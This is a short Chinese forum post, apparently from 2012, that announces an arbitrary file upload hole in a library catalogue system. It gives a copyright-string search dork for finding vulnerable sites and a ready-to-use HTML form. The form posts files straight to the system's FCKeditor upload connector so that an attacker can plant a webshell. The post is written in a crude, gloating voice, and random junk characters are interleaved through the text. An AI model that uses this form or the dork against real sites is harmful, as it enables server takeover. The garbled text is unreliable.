主题:图书馆系统任意文件上传漏洞! K3 b" X. n5 H( _8 f
作者:冰锋刺客1 Q3 |, R. r" A1 {" T" [( h
厂商:点击书(dianjishu.com)
: X" f0 D5 H1 G3 ?' e; k 日期:2012-6-21
( M$ s/ w( W- j3 }9 j
1 z) D9 K$ q" @/ b. xI 概述
, G7 ]5 r% E9 d5 [! d/ v! _ 点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell
; ?6 u7 J3 J3 D& {; J, N) S6 R" r. F II 简介
# O- _2 I% o7 q0 Y- N3 `; W! p 关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"' G/ ?# U [# O% _) t
补充一个漏洞
4 H, x: B% M" a( Q9 O <form id="frmUpload" enctype="multipart/form-data"3 y R+ @7 S0 F: p2 v
action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>: b, @- h/ T" j( L$ j. m' b4 x& y
<input id="btnUpload" type="submit" value="操翻他">" s. F- B; [# p" f% _$ O; m
</form>
" S) p4 |; V& a$ J, E: V 你们懂的
* A8 p9 S) V; O4 @0 e 那傻逼提供还需要改包.
/ b4 L5 P' u; I, l 自己看了下源代码发现fckeditor& o" f+ M ]; ~7 e/ v0 G
直接秒杀
$ s ^4 W& o. X0 N# N8 t |